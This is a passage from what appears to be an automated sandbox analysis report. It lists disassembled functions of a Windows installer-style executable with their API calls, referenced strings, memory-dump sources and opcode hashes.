                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                  • String ID: Failed to initialize COM on cache thread.
                                                                                                                                                                  • API String ID: 3442037557-3629645316
                                                                                                                                                                  • Opcode ID: e9ac557021912fb6e20968632e74ad7c10347313f252331412afe60e5d70a5e0
                                                                                                                                                                  • Instruction ID: df506fe76a60ce13978c8f1ecb4c7d0c7f5a8e0b226abc7772892816aa8e0f87
                                                                                                                                                                  • Opcode Fuzzy Hash: e9ac557021912fb6e20968632e74ad7c10347313f252331412afe60e5d70a5e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 72012D72600619BFD7059BA5E884EDBBBACFF18354B108136F609E7121DB34AD548B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436045, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0043608B
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004360BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  • Opcode ID: b843395dc20ac32adba7ffa7778a2b118022d6c1175e5872159a381f332b95ad
                                                                                                                                                                  • Instruction ID: 9aec028315e8f5d8a09a2329a02dd92b72582fb9749f43b6aecadda0a3caf0ca
                                                                                                                                                                  • Opcode Fuzzy Hash: b843395dc20ac32adba7ffa7778a2b118022d6c1175e5872159a381f332b95ad
                                                                                                                                                                  • Instruction Fuzzy Hash: F601843164021ABBDF208A959809F6776B8EF497A1F11512BFE04AB290C7BC8C1496A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00435FBE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00436004
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00436037
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  • Opcode ID: bf65511214315a6864903a07c208957e0400cc5fa2aafbf0f6eaaabcbac9b8ee
                                                                                                                                                                  • Instruction ID: 683e17dae1f1702a0dbe8b7bb86271a155e05e83094b06fa3fdc4c7d9129e049
                                                                                                                                                                  • Opcode Fuzzy Hash: bf65511214315a6864903a07c208957e0400cc5fa2aafbf0f6eaaabcbac9b8ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 6801D431640219BBCB204E588809FAB76A8EF497A2F11513BFD009B280C6B8CC0087A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436280, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00436125,?), ref: 004362F1
                                                                                                                                                                  Strings
                                                                                                                                                                  • EnableLUA, xrefs: 004362BF
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0043629E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                                  • API String ID: 3535843008-3551287084
                                                                                                                                                                  • Opcode ID: 7d7e19c53bd41b4964d88377bb3f94dd32ff6592c9e26f1f1afdb21a6cc9277f
                                                                                                                                                                  • Instruction ID: e65c4e626866ccfd62e32b4cdcfda89be3b1276e042c0eaed6e306b21da33873
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d7e19c53bd41b4964d88377bb3f94dd32ff6592c9e26f1f1afdb21a6cc9277f
                                                                                                                                                                  • Instruction Fuzzy Hash: D6017532900136FBD710AA64C906B9EF768DB18726F2291A6ED01B7151D3BC5E5096D8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042D672, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                  • String ID: nE
                                                                                                                                                                  • API String ID: 3494438863-985951428
                                                                                                                                                                  • Opcode ID: 96916c148a15d7aa1daca61402ae1d6c5afc2ee9f968a84ea2e1f4e048586c2b
                                                                                                                                                                  • Instruction ID: a5c38b317aeaf69d5fe0f19f4e881beb0fe4ef430a2d749a1bb699318abde173
                                                                                                                                                                  • Opcode Fuzzy Hash: 96916c148a15d7aa1daca61402ae1d6c5afc2ee9f968a84ea2e1f4e048586c2b
                                                                                                                                                                  • Instruction Fuzzy Hash: 52F04F72B093318FE715CB19BC51AAA3795AB08725B95403BF908CB296F778C8418A8C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402E54, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00402E66
                                                                                                                                                                    • Part of subcall function 00432058: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00402807,00000000), ref: 0043206C
                                                                                                                                                                    • Part of subcall function 00432058: GetProcAddress.KERNEL32(00000000), ref: 00432073
                                                                                                                                                                    • Part of subcall function 00432058: GetLastError.KERNEL32(?,?,?,00402807,00000000), ref: 0043208A
                                                                                                                                                                    • Part of subcall function 0040266A: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 004026F1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00402EA3
                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 00402E89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                                                  • API String ID: 3109562764-2681622189
                                                                                                                                                                  • Opcode ID: 2f8a5c833f6b0ea1a78e355105ad8a71ea34bcd7a5a76490f3e595866f1f93fa
                                                                                                                                                                  • Instruction ID: 5fdf223394da78b76da0e64854f98c3561b71e7c1051f8dcb25c2eb9100efafd
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f8a5c833f6b0ea1a78e355105ad8a71ea34bcd7a5a76490f3e595866f1f93fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D016232D40228BBCF12A790DD09ADF7A78DF04721F20416BF800B61D1D7B9AF4096D8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004373A3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0041218D,00000000,?,00000000,?,?,?,00436668,?,?,?), ref: 004373C7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00436668,?,?,?), ref: 004373D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 442123175-2967768451
                                                                                                                                                                  • Opcode ID: 3f7a4c90ef6406fccd583da9a26ca2b79419b93d715434aa8349c71945566812
                                                                                                                                                                  • Instruction ID: 8def8f10637bbeb596de96770921654305c239a11b15e833ac6f72051dece859
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f7a4c90ef6406fccd583da9a26ca2b79419b93d715434aa8349c71945566812
                                                                                                                                                                  • Instruction Fuzzy Hash: B1F08C72600229BBC7219EAADD45F9FBBADFB48791F000226FD44E7040E634EA00D6F5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B468, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000,?,?,00422483,000000F9,00000000), ref: 0040B4BF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open registration key., xrefs: 0040B48F
                                                                                                                                                                  • Failed to update resume mode., xrefs: 0040B4A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to open registration key.$Failed to update resume mode.
                                                                                                                                                                  • API String ID: 3535843008-3366686031
                                                                                                                                                                  • Opcode ID: 3ea2fd52f9f6d61327952b70e3047b7bef9931f1bac6e750f3073c7806274872
                                                                                                                                                                  • Instruction ID: 264c811c8ac8cec9de031824c972863810d233ffbf0731f7b3a04f58ebf5043d
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ea2fd52f9f6d61327952b70e3047b7bef9931f1bac6e750f3073c7806274872
                                                                                                                                                                  • Instruction Fuzzy Hash: 05F0C832940228F7DB229A45DD02F9FB669DF10764F204026F600761D2D77DAE1096DC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436FAF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,00412161,00000000,00000000,00000000,00000000,00000000), ref: 00436FC7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00412161,00000000,00000000,00000000,00000000,00000000,?,00401414,00000000,?), ref: 00436FD1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 2976181284-2967768451
                                                                                                                                                                  • Opcode ID: 0daa46f3151ac7bcbf0a49e38a1437a25d8f264d1841d9d25c63a3a027dfc035
                                                                                                                                                                  • Instruction ID: 9da2a515ca5181ae83d80d91c7883083a5b2527a057c39bdab206838e20f6cb1
                                                                                                                                                                  • Opcode Fuzzy Hash: 0daa46f3151ac7bcbf0a49e38a1437a25d8f264d1841d9d25c63a3a027dfc035
                                                                                                                                                                  • Instruction Fuzzy Hash: 37F08C71A04229AFDB258F65DC09BAB7AE9EF08790F014126FD05E7260E375DD10DAE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004370A5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,7519FB40,?,?,?,00407847,00401C5F,?,?,00000000,00000000), ref: 004370BD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00407847,00401C5F,?,?,00000000,00000000,?,?,?,00401C5F,77A19EB0,00000000), ref: 004370C7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastSize
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 464720113-2967768451
                                                                                                                                                                  • Opcode ID: 0b5358b522b280326b6fbc6d24f08fd182a99dd0b015916d79615b5c86244eca
                                                                                                                                                                  • Instruction ID: d73dd3a31d977a3c4ff6faf4cb48779b21e8b95bbfe86d3e160cc6234ff5c219
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b5358b522b280326b6fbc6d24f08fd182a99dd0b015916d79615b5c86244eca
                                                                                                                                                                  • Instruction Fuzzy Hash: 87F04FB2A01225BB97149F5A9805A9BFBECEF48650B11422AFD45E7340D374AD00CBE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00438698, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,20000005,00000000,75C08550,00000000), ref: 004386B8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00425461,00000000,?,00000000,00000000,00000078,?,75C08550,HEAD,00000000,00000000,00000000,?), ref: 004386C2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpInfoLastQuery
                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                  • API String ID: 4218848986-2900720265
                                                                                                                                                                  • Opcode ID: b36d4183b227110359365532171ccbb3d27a972eb3bb710b4a842cd904d8c1ad
                                                                                                                                                                  • Instruction ID: 2b22d4093e4ce0710ac2b8f9cab43a03be5333fe10c0f2799cc3b774b4e11522
                                                                                                                                                                  • Opcode Fuzzy Hash: b36d4183b227110359365532171ccbb3d27a972eb3bb710b4a842cd904d8c1ad
                                                                                                                                                                  • Instruction Fuzzy Hash: 55F06272600228BBD7109F95DD09B9BFAA8EF04355F00421AFD01E7240EA74DA008BE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004386FC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(?,?,00000000,?,?), ref: 00438725
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043872F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpInfoLastQuery
                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                  • API String ID: 4218848986-2900720265
                                                                                                                                                                  • Opcode ID: bf2feaebf943ff4de91d882a635b9f94a1d47ddad1ddc0abbd16f50784405c08
                                                                                                                                                                  • Instruction ID: 5fe7a205227bbeb3eb5525785ef056c2ba46ace47d9644d00ddbc284809fdd63
                                                                                                                                                                  • Opcode Fuzzy Hash: bf2feaebf943ff4de91d882a635b9f94a1d47ddad1ddc0abbd16f50784405c08
                                                                                                                                                                  • Instruction Fuzzy Hash: C8F036B2A10228BBEB109FA59C05FAFBAECEB04640F114126FD01E7140E7759E0097E4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00435A58, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00435A6D
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435A9D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  • Opcode ID: 52c66138c24c6d28fe317aca896fce037b64b7fe153ff2fcd61e307a52435ec0
                                                                                                                                                                  • Instruction ID: 7a4bf459dfc8f871d637eafb5fc932349acf003c505def2bbdfc5553a8df5220
                                                                                                                                                                  • Opcode Fuzzy Hash: 52c66138c24c6d28fe317aca896fce037b64b7fe153ff2fcd61e307a52435ec0
                                                                                                                                                                  • Instruction Fuzzy Hash: DEF0E031641A15EBC7215F54DC48F5B77A4EF89771F15122AFD04AB310C7788C1097D8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043644A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,?,?,00000000,?,?,?), ref: 00436471
                                                                                                                                                                  • CoCreateInstance.OLE32(00000001,00000000,00000001,004537A8,00000000), ref: 00436489
                                                                                                                                                                  Strings
                                                                                                                                                                  • Microsoft.Update.AutoUpdate, xrefs: 0043646C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                                  • String ID: Microsoft.Update.AutoUpdate
                                                                                                                                                                  • API String ID: 2151042543-675569418
                                                                                                                                                                  • Opcode ID: 84d588e92bc565ca5c3b16b09a6946c3cec984a7fde3f217bac370fceb8be6c5
                                                                                                                                                                  • Instruction ID: ab892e728e3fe550d83bb20e20be6664cdb86b9258d64896b204cc20e733082d
                                                                                                                                                                  • Opcode Fuzzy Hash: 84d588e92bc565ca5c3b16b09a6946c3cec984a7fde3f217bac370fceb8be6c5
                                                                                                                                                                  • Instruction Fuzzy Hash: 93F0B431A00208BFDB00DFA8DC05AEFB7B8AB08741F404036EA01E3151DA74AA0886AA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00435CFF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00435D14
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435D44
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                  • Opcode ID: e0c88e5c0cb610fd30cf4c45c4bbcc91821b5fdd54072593c776f8a7e42a3e9c
                                                                                                                                                                  • Instruction ID: d60045897c169dae4cfd37fd0678cf8ce8402dc30d135672655e28143b771af1
